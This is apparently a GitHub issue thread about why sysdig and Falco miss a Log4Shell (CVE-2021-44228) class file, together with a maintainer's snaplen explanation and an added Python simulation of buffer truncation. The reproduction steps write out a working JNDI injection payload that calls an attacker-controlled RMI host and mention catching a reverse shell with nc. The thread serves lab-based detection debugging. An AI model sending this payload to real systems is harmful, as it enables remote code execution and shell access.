Closed ch3n9w closed 1 year ago
Hi @ch3n9w! Capturing the I/O operations is very costly. For this reason the snaplen is limited to 80 bytes by default. Try increasing it using the --snaplen flag 😄
@therealbobo Oh! Thank you, I was just wondering why falco can't detect CVE-2021-44228 with its rules, thank you for saving my weekend!
When I reproduced CVE-2021-44228 and tried to capture network traffic with sysdig following this blog, I couldn't capture the class file in %evt.buffer.
sysdig version 0.31.5
OS: Linux version 5.4.0-148-generic (buildd@lcy02-amd64-112) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1))
Steps to reproduce:
Set up a testing environment with vulhub.
Set up an RMI server with JNDI-Injection-Exploit, and launch nc to wait for the reverse shell.
Send a payload to perform the JNDI attack, like
/solr/admin/cores?action=${jndi:rmi://192.168.31.14:1099/isjqzm}
Watch nc receive the reverse shell connection, while the output of sysdig doesn't contain the cafebabe bytecode and the malicious class file.
However, Wireshark can capture the whole class file correctly:
Is there something I'm missing? What can I do to help?
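To make the snaplen point from the maintainer's reply concrete, here is an added Python example; it is not code from this issue or from the sysdig project. It models what a per-event check such as a sysdig-style `evt.buffer contains cafebabe` filter actually sees when each captured read buffer is cut to the default 80 bytes versus a larger snaplen, and it also shows a remaining caveat: a class-file magic number that straddles two reads is invisible to per-event matching even with a generous snaplen. The payload layout (120 bytes of filler framing before a fake class file) and the read sizes are constructed for illustration.

```python
"""Simulate why a per-event 'buffer contains cafebabe' check misses a class
file under an 80-byte snaplen.  Constructed example, not sysdig code."""

# Java class files start with the magic number 0xCAFEBABE.
CLASS_MAGIC = bytes.fromhex("cafebabe")
DEFAULT_SNAPLEN = 80  # sysdig's default, as stated in the maintainer's reply


def build_sample_response(prefix_len: int) -> bytes:
    """Constructed stand-in for a server reply that carries a class file
    after `prefix_len` bytes of protocol framing (all filler here)."""
    prefix = b"JRMI" + b"\x00" * (prefix_len - 4)
    # magic number, a class-file version field, then padding
    fake_class = CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x00" * 64
    return prefix + fake_class


def capture(payload: bytes, snaplen: int, read_size: int) -> list:
    """Model the per-read buffers a syscall tracer records: the socket is
    read `read_size` bytes at a time and each recorded buffer is truncated
    to `snaplen` bytes, which is what the snaplen setting controls."""
    return [payload[i:i + read_size][:snaplen]
            for i in range(0, len(payload), read_size)]


def flagged_events(buffers: list) -> list:
    """Per-event matching, the way a filter on a single event's buffer
    behaves: indices of events whose truncated buffer holds the magic."""
    return [i for i, buf in enumerate(buffers) if CLASS_MAGIC in buf]


def flagged_in_stream(buffers: list) -> bool:
    """Stream-level matching: concatenate the captured buffers before
    searching, so a magic number split across two reads is still found.
    It cannot recover bytes the snaplen already discarded."""
    return CLASS_MAGIC in b"".join(buffers)


if __name__ == "__main__":
    payload = build_sample_response(prefix_len=120)  # magic lands at offset 120
    for snaplen, read_size in [(DEFAULT_SNAPLEN, 4096), (4096, 4096), (4096, 121)]:
        bufs = capture(payload, snaplen, read_size)
        print(f"snaplen={snaplen:5d} read_size={read_size:5d} "
              f"per-event hits={flagged_events(bufs)} "
              f"stream hit={flagged_in_stream(bufs)}")
```

With the default snaplen the magic at offset 120 is never recorded, so no per-event or stream-level check can find it; raising the snaplen fixes that case. The third run shows that when the magic happens to straddle a read boundary, only matching over the reassembled stream catches it, which is worth keeping in mind when a rule keyed on `evt.buffer` stays silent even after the snaplen has been raised.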